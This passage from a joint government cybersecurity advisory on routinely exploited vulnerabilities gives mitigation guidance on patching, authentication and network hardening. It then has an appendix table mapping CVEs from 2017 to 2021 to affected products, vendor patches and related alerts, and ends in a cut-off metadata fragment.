retired in April 2021.\n * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications\u2014such as webmail, file storage, file sharing, and chat and other employee collaboration tools\u2014for their customers. However, as MSPs and CSPs expand their client organization's attack surface and may introduce unanticipated risks, organizations should proactively collaborate with their MSPs and CSPs to jointly reduce that risk. For more information and guidance, see the following resources. \n * CISA Insights [Risk Considerations for Managed Service Provider Customers](<https://cisa.gov/sites/default/files/publications/cisa-insights_risk-considerations-for-msp-customers_508.pdf>)\n * CISA Insights [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)\n * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/acsc/view-all-content/publications/how-manage-your-security-when-engaging-managed-service-provider>)\n\n#### **Identity and Access Management**\n\n * Enforce multifactor authentication (MFA) for all users, without exception.\n * Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords. \n * Regularly review, validate, or remove privileged accounts (annually at a minimum).\n * Configure access control under the concept of least privilege principle. \n * Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (non-administrative privileges).\n\n**Note:** see [CISA Capacity Enhancement Guide \u2013 Implementing Strong Authentication](<https://cisa.gov/sites/default/files/publications/CISA_CEG_Implementing_Strong_Authentication_508_1.pdf>) and ACSC guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/acsc/view-all-content/publications/implementing-multi-factor-authentication>) for more information on hardening authentication systems.\n\n#### **Protective Controls and Architecture **\n\n * Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. \n * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.\n * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.\n * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).\n * Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks. \n * Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware. \n * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure your EDR, SIEM, vulnerability scanner etc., are reporting the same number of assets.\n * Monitor the environment for potentially unwanted programs.\n * Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions.\n * Implement application allowlisting. \n\n### **Resources**\n\n * For the top vulnerabilities exploited in 2020, see joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>)\n * For the top exploited vulnerabilities 2016 through 2019, see joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa20-133a>). \n * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.\n\n### **Disclaimer**\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA, the FBI, NSA, ACSC, CCCS, NZ NCSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **Purpose **\n\nThis document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **References**\n\n[1] [CISA\u2019s Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)\n\n### **Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities**\n\nCVE\n\n| \n\nVendor\n\n| \n\nAffected Products\n\n| \n\nPatch Information\n\n| \n\nResources \n \n---|---|---|---|--- \n \n[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>)\n\n| \n\nSitecore\n\n| \n\nSitecore XP 7.5.0 - Sitecore XP 7.5.2\n\nSitecore XP 8.0.0 - Sitecore XP 8.2.7\n\n| \n\n[Sitecore Security Bulletin SC2021-003-499266](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776#HistoryOfUpdates>)\n\n| \n\nACSC Alert [Active Exploitation of vulnerable Sitecore Experience Platform Content Management Systems](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerable-sitecore-experience-platform-content-management-systems>) \n \n[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>)\n\n| \n\nForgeRock \n\n| \n\nAccess Management (AM) 5.x, 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3\n\nOpenAM 9.x, 10.x, 11.x, 12.x and 13.x\n\n| \n\n[ForgeRock AM Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>)\n\n| \n\nACSC Advisory [Active exploitation of ForgeRock Access Manager / OpenAM servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-004-active-exploitation-forgerock-access-manager-openam-servers>)\n\nCCCS [ForgeRock Security Advisory](<https://www.cyber.gc.ca/en/alerts/forgerock-security-advisory>) \n \n[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n\n| \n\nAccellion \n\n| \n\nFTA 9_12_370 and earlier\n\n| \n\n[Accellion Press Release: Update to Recent FTA Security Incident](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)\n\n| \n\nJoint CSA [Exploitation of Accellion File Transfer Appliance](<https://www.cisa.gov/uscert/ncas/alerts/aa21-055a>)\n\nACSC Alert [Potential Accellion File Transfer Appliance compromise](<https://www.cyber.gov.au/acsc/view-all-content/alerts/potential-accellion-file-transfer-appliance-compromise>) \n \n[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>)\n\n| \n\nFTA 9_12_411 and earlier \n \n[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>)\n\n| \n\nFTA versions 9_12_411 and earlier \n \n[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>)\n\n| \n\nFTA 9_12_370 and earlier\n\n| \n \n[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n\n| \n\nVMware \n\n| \n\nvCenter Server 7.0, 6.7, 6.5\n\nCloud Foundation (vCenter Server) 4.x and 3.x\n\n| \n\n[VMware Advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>)\n\n| \n\nCCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-41>) \n \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)\n\n| \n\nVMware\n\n| \n\nvCenter Server 7.0, 6.7, 6.5\n\nCloud Foundation (vCenter Server) 4.x and 3.x\n\n| \n\n[VMware Advisory VMSA-2021-0002](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>)\n\n| \n\nACSC Alert [VMware vCenter Server plugin remote code execution vulnerability](<https://www.cyber.gov.au/acsc/view-all-content/alerts/vmware-vcenter-server-plugin-remote-code-execution-vulnerability-cve-2021-21972>)\n\nCCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-35>)\n\nCCCS Alert [APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>)\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv\n\n| \n\n[SonicWall Security Advisory SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>)\n\n| \n\nACSC Alert [Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)\n\nCCCS [SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4>) \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache\n\n| \n\nLog4j, all versions from 2.0-beta9 to 2.14.1\n\nFor other affected vendors and products, see [CISA's GitHub repository](<https://github.com/cisagov/log4j-affected-db>).\n\n| \n\n[Log4j: Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html>)\n\nFor additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>)\n\n| \n\nCISA webpage [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)\n\nCCCS [Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability>) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)\n\n| \n\nZoho ManageEngine \n\n| \n\nADSelfService Plus version 6113 and prior\n\n| \n\n[Zoho ManageEngine: ADSelfService Plus 6114 Security Fix Release ](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>)\n\n| \n\nJoint CSA [APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://www.cisa.gov/uscert/ncas/alerts/aa21-259a>)\n\nCCCS [Zoho Security Advisory](<https://www.cyber.gc.ca/en/alerts/zoho-security-advisory>) \n \n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>)\n\n| \n\n[Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>)\n\n| \n \n[CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)\n\n| \n\n[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)\n\n| \n\nJoint CSA [Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>)\n\nCCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched \u2013 Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n| \n\nMicrosoft \n\n| \n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nMicrosoft Exchange Server 2016 Cumulative Updates 19 and 20\n\nMicrosoft Exchange Server 2019 Cumulative Updates 8 and 9\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>)\n\n| \n\nJoint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>)\n\nACSC Alert [Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/acsc/view-all-content/alerts/microsoft-exchange-proxyshell-targeting-australia>) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Exchange Server versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Exchange Server versions; see [Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>)\n\n| \n\n[Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) \n \n[CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>)\n\n| \n\nSudo\n\n| \n\nSudo before 1.9.5p2\n\n| \n\n[Sudo Stable Release 1.9.5p2](<https://www.sudo.ws/releases/stable/#1.9.5p2>)\n\n| \n \n[CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>)\n\n| \n\nCheckbox Survey\n\n| \n\nCheckbox Survey versions prior to 7\n\n| \n\n| \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nMultiple versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>)\n\n| \n\nCISA Alert: [Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-062a>)\n\nACSC Advisory [Active exploitation of Vulnerable Microsoft Exchange servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-002-active-exploitation-vulnerable-microsoft-exchange-servers>)\n\nCCCS Alert [Active Exploitation of Microsoft Exchange Vulnerabilities - Update 4](<https://www.cyber.gc.ca/en/alerts/active-exploitation-microsoft-exchange-vulnerabilities>) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>) \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)\n\n| \n\nJira Atlassian \n\n| \n\nConfluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n| \n\n[Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)\n\n| \n\nACSC Alert [Remote code execution vulnerability present in certain versions of Atlassian Confluence](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence>)\n\nCCCS [Atlassian Security Advisory](<https://www.cyber.gc.ca/en/alerts/atlassian-security-advisory>) \n \n[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>)\n\n| \n\nPulse Secure \n\n| \n\nPCS 9.0R3/9.1R1 and Higher\n\n| \n\n[Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>)\n\n| \n\nCCCS Alert [Active Exploitation of Pulse Connect Secure Vulnerabilities - Update 1](<https://www.cyber.gc.ca/en/alerts/active-exploitation-pulse-connect-secure-vulnerabilities>) \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>)\n\n| \n\nSonicWall \n\n| \n\nSMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v)\n\n| \n\n[SonicWall Security Advisory SNWLID-2021-0001](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001>)\n\n| \n \n[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>)\n\n| \n\nMicrosoft\n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)\n\n| \n\n[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)\n\n| \n\nCCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched \u2013 Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) \n \n[CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>)\n\n| \n\nQNAP \n\n| \n\nQTS, multiple versions; see [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>)\n\nQuTS hero h4.5.1.1491 build 20201119 and later\n\n| \n\n[QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>)\n\n| \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\n\n| \n\nMicrosoft \n\n| \n\nWindows Server, multiple versions; see [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n\n| \n\n[Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n\n| \n\nACSC Alert [Netlogon elevation of privilege vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCCCS Alert [Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n\n| \n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nJoint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>)\n\nCCCS Alert [Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://www.cyber.gc.ca/en/alerts/microsoft-exchange-validation-key-remote-code-execution-vulnerability>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\nCitrix \n\n| \n\nADC and Gateway version 13.0 all supported builds before 13.0.47.24\n\nNetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12\n\nSD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n| \n\n[Citrix Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>)\n\n| \n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nCCCS Alert [Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0>) \n \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n\n| \n\nProgress Telerik \n\n| \n\nUI for ASP.NET AJAX through 2019.3.1023\n\n| \n\n[Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization>)\n\n| \n\nACSC Alert [Active exploitation of vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\nPulse Secure \n\n| \n\nPulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n\n| \n\n[Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n| \n\nCISA Alert [Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa20-010a>)\n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nACSC Advisory [Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCCCS [Alert APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n\n| \n\nFortinet\n\n| \n\nFortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6\n\n| \n\n[Fortinet FortiGuard Labs: FG-IR-20-233](<https://www.fortiguard.com/psirt/FG-IR-20-233>)\n\n| \n\nJoint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>)\n\nJoint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nACSC Alert [APT exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\nCCCS Alert [Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1](<https://www.cyber.gc.ca/en/alerts/exploitation-fortinet-fortios-vulnerabilities-cisa-fbi>) \n \n[CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>)\n\n| \n\nCisco \n\n| \n\nSee [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>)\n\n| \n\n[Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>)\n\n| \n\nCCCS [Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature](<https://www.cyber.gc.ca/en/alerts/action-required-secure-cisco-ios-and-ios-xe-smart-install-feature>) \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n\n| \n\nMicrosoft \n\n| \n\nOffice, multiple versions; see [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)\n\n| \n\nCCCS Alert [Microsoft Office Security Update](<https://www.cyber.gc.ca/en/alerts/microsoft-office-security-update>) \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple products; see [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>)\n\n| \n\nCCCS [Microsoft Security Updates](<https://www.cyber.gc.ca/en/alerts/microsoft-security-updates>) \n \n### Contact Information\n\n**U.S. organizations: **all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov ](<mailto:report@cisa.gov>)or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). **Australian organizations:** visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. **Canadian organizations:** report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>). **New Zealand organizations:** report cyber security incidents to [incidents@ncsc.govt.nz](<mailto:incidents@ncsc.govt.nz>) or call 04 498 7654. **United Kingdom organizations:** report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or, for urgent assistance, call 03000 200 973.\n\n### Revisions\n\nApril 27, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 